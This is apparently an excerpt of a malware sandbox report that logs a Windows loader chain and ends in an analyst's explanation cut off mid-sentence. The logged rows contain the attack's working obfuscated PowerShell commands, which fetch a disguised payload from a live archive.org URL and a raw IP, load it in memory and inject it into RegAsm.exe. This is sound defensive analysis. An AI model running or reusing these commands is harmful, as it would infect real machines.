? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? 
? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 28_2_00412132
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_00419662 mouse_event,28_2_00419662
                  Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES89F7.tmp" "c:\Users\user\AppData\Local\Temp\imlwlgjg\CSCE8D62BF91CF49AAAEBCC2A37BB3C45C.TMP"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? 
? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCDF9.tmp" "c:\Users\user\AppData\Local\Temp\mjo4tj0d\CSC1D7DFCB3A844EFFBAC81F2560943E20.TMP"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdfiawvnn24gicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhreqtvhlqrsagicagicagicagicagicagicagicagicagicagicatbwvtqmvyzevgsw5pvelpbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmtu9ulkrmtcisicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagdkusc3ryaw5nicagicagicagicagicagicagicagicagicagicagihriqm4sc3ryaw5nicagicagicagicagicagicagicagicagicagicagihpdclzdwnrolhvpbnqgicagicagicagicagicagicagicagicagicagicagaktgr1nmd3zhavissw50uhryicagicagicagicagicagicagicagicagicagicagie1uve9xktsnicagicagicagicagicagicagicagicagicagicagic1uqu1ficagicagicagicagicagicagicagicagicagicagicj2uxdrt05jalvjbsigicagicagicagicagicagicagicagicagicagicaglw5btuvzuefjzsagicagicagicagicagicagicagicagicagicagicbnqwcgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakmuhpzu03bjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zlje5my4xntuvegftchavym96l3dly3jlyxrlzgj1dhrlcnntb290agj1dhrlcnroaw5ncy50suyilcikrw52okfquerbvefcd2vjcmvhdgvkynv0dgvyc21vb3roynv0dgvydghpbi52qlmildasmck7u1rbulqtc0xfzxaomyk7c1rhunqgicagicagicagicagicagicagicagicagicagicagiirfbny6qvbqrefuqvx3zwnyzwf0zwridxr0zxjzbw9vdghidxr0zxj0aglulnzcuyi='+[char]34+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdfiawvnn24gicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhreqtvhlqrsagicagicagicagicagicagicagicagicagicagicatbwvtqmvyzevgsw5pvelpbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmtu9ulkrmtcisicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagdkusc3ryaw5nicagicagicagicagicagicagicagicagicagicagihriqm4sc3ryaw5nicagicagicagicagicagicagicagicagicagicagihpdclzdwnrolhvpbnqgicagicagicagicagicagicagicagicagicagicagaktgr1nmd3zhavissw50uhryicagicagicagicagicagicagicagicagicagicagie1uve9xktsnicagicagicagicagicagicagicagicagicagicagic1uqu1ficagicagicagicagicagicagicagicagicagicagicj2uxdrt05jalvjbsigicagicagicagicagicagicagicagicagicagicaglw5btuvzuefjzsagicagicagicagicagicagicagicagicagicagicbnqwcgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakmuhpzu03bjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zlje5my4xntuvegftchavym96l3dly3jlyxrlzgj1dhrlcnntb290agj1dhrlcnroaw5ncy50suyilcikrw52okfquerbvefcd2vjcmvhdgvkynv0dgvyc21vb3roynv0dgvydghpbi52qlmildasmck7u1rbulqtc0xfzxaomyk7c1rhunqgicagicagicagicagicagicagicagicagicagicagiirfbny6qvbqrefuqvx3zwnyzwf0zwridxr0zxjzbw9vdghidxr0zxj0aglulnzcuyi='+[char]34+'))')))"
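The process-creation rows above describe the whole loader chain. wscript.exe starts powershell.exe with a `$Codigo` string that is UTF-16LE base64 in which every `A` has been swapped for a filler run (rendered on this page as `? ? ? ? ?`). The decoded script is the second powershell.exe row: it downloads `vbs.jpg` from archive.org, carves the text between `<<BASE64_START>>` and `<<BASE64_END>>`, base64-decodes it, hands the bytes to `[System.Reflection.Assembly]::Load`, and calls `dnlib.IO.Home.VAI` with a reversed URL and the name of the host process (`RegAsm`, matching the RegAsm.exe row). Two details matter for triage: the statement `$startIndex -ge 0 -and $endIndex -gt $startIndex;` is a bare expression whose value is never used, 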